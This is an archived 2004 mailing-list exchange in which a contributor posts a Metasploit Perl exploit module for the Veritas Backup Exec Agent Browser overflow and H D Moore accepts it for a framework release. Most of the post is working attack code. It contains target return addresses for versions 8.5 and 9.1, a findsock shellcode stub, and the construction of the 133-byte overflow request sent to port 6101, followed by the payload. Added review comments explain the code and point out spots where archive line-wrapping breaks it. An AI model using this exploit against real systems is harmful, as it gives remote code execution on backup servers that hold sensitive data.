
Veritas Backup Exec Agent Browser Overflow


From: hdm at metasploit.com (H D Moore)
Date: Thu, 16 Dec 2004 15:14:14 -0600

Thanks! We should be able to include this in the 2.3 release (due out 
sometime early January).

-HD

On Thursday 16 December 2004 15:10, syscall wrote:
http://www.idefense.com/application/poi/display?id=169

Exploit code for the Veritas bug.

___________________________________

package Msf::Exploit::backupexec_ns;
use base "Msf::Exploit";
use strict;
use Pex::Text;

# Advanced-option table, handed to Msf::Exploit as 'Advanced' in new();
# this module declares none.
my $advanced = { };

# Module metadata, handed to Msf::Exploit as 'Info' in new().
my $info =
{
    'Name'  => 'Veritas Backup Exec Agent Browser Overflow',
    'Authors' => [ 'Thor Doomen <syscall at inbox.lv>' ],
    'Arch'  => [ 'x86' ],
    'OS'    => [ 'win32' ],
    'Priv'  => 1,
    # Connection options: RHOST is required; RPORT defaults to 6101.
    'UserOpts'  => {
                    'RHOST' => [1, 'ADDR', 'The target address'],
                    'RPORT' => [1, 'PORT', 'The target port', 6101],
                },

    # Payload constraints: up to 1024 bytes, no NOP padding, and no bad
    # characters declared (Exploit() sends the payload with its own Send
    # call, after the request).
    'Payload' => {
                 'MinNops'   => 0,
                 'MaxNops'   => 0,
                 'Space'     => 1024,
                 'BadChars'  => '',
                 },

    # NOTE(review): one-line placeholder; the iDefense advisory under
    # 'Refs' is the only detail given.
    'Description'  => Pex::Text::Freeform(qq{
Veritas overflow bug.
    }),

    # NOTE(review): the list archive HTML-escaped the closing quote of the
    # URL below (&apos;) and wrapped the 'Targets' key and the per-row
    # comments onto lines of their own, so this hash will not parse as
    # pasted.  Each target row is [ display name, addr1, addr2 ]; the
    # wrapped comments label addr1 as "recv at bnetns.exe" and addr2 as
    # "esi at beclass.dll" for that product build.
    'Refs'    => [
'http://www.idefense.com/application/poi/display?id=169&apos; ], 'Targets'
=> [
                   ['Veritas BE 9.1 ', 0x014476eb, 0x401150FF], #
recv at bnetns.exe v9.1.4691.0 | esi at beclass.dll v9.1.4691.0
                   ['Veritas BE 8.5 ', 0x014308b9, 0x401138FF], #
recv at bnetns.exe v8.50.3572  | esi at beclass.dll v8.50.3572
                 ],
};

sub new {
    my ($class, @args) = @_;

    # Hand the module metadata and the (empty) advanced-option table to
    # the framework constructor; any further arguments pass straight
    # through to it.
    my %ctor_args = (
        'Info'     => $info,
        'Advanced' => $advanced,
    );
    my $self = $class->SUPER::new( \%ctor_args, @args );

    return $self;
}

sub Exploit {
    # Connects to RHOST:RPORT (RPORT defaults to 6101 in $info), sends a
    # fixed-length 133-byte request built from the selected target's two
    # addresses, then sends filler and the encoded payload on the same
    # connection.  Returns nothing; a socket error is reported through
    # PrintLine and ends the attempt.
    my $self        = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
    # One row of the 'Targets' table in $info: [ name, addr1, addr2 ].
    # NOTE(review): TARGET is not range-checked here; presumably the
    # framework validates it before Exploit() runs -- confirm.
    my $target      = $self->Targets->[$target_idx];

    $self->PrintLine( "[*] Attempting to make exploit target " .
$target->[0] );

    # NOTE(review): Msf::Socket::Tcp is not loaded by this file; presumably
    # the Msf::Exploit base class brings it in -- confirm.
    my $s = Msf::Socket::Tcp->new(
        'PeerAddr'  => $target_host,
        'PeerPort'  => $target_port,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
    );

    if ( $s->IsError ) {
        $self->PrintLine( '[*] Error creating socket: ' . $s->GetError
); return;
    }

    # 112-byte buffer, initially all 0xfc; two regions are patched in
    # place with substr() below.
    my $code = "\xfc" x 112;

    # findsock - recv!bnetns.exe (iat)
    # 51-byte stub.  The 4 bytes at offset 29 (as pasted, 0x401150FF --
    # the 9.1 row's addr2) are replaced with the selected target's addr2
    # before the stub is copied into the buffer.
    my $read =
       
"\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74" .
"\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11" .
"\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75" .
"\xe1\xff\xd7";

    substr( $read, 29, 4, pack( 'V', $target->[2] ) );
    # Stub occupies buffer offsets 2..52; the target's addr1 (the column
    # labelled "recv at bnetns.exe") is written little-endian at offset 66.
    substr( $code, 2, length($read), $read );
    substr( $code, 66, 4, pack( 'V', $target->[1] ) );

    # Wire format: 6-byte prefix, the 112-byte buffer, NUL, the literal
    # "1.1.1.1.1.1", NUL, 2-byte trailer -- 133 bytes in total.  The prefix,
    # the literal, the trailer and the length are the same for every
    # target row, so they are the stable parts a network detection for
    # this request can key on.
    my $req =
        "\x02\x00\x32\x00\x20\x00" . $code . "\x00"
      . "1.1.1.1.1.1\x00"
      . "\xeb\x81";

    # NOTE(review): the list archive wrapped this line inside the string
    # literal, so the message now contains a newline where the original
    # presumably had a space.
    $self->PrintLine( "[*] Sending attack of " . length($req) . "
bytes..." ); $s->Send($req);

    $self->PrintLine("[*] Sending the shell code...");

    # make socket flush
    # 512 bytes of filler ("pPpP" x 128) go out ahead of the payload.
    $s->Send( "pPpP" x 128 );

    $s->Send($shellcode);

    $self->PrintLine("[*] Wait for response...");

    return;
}



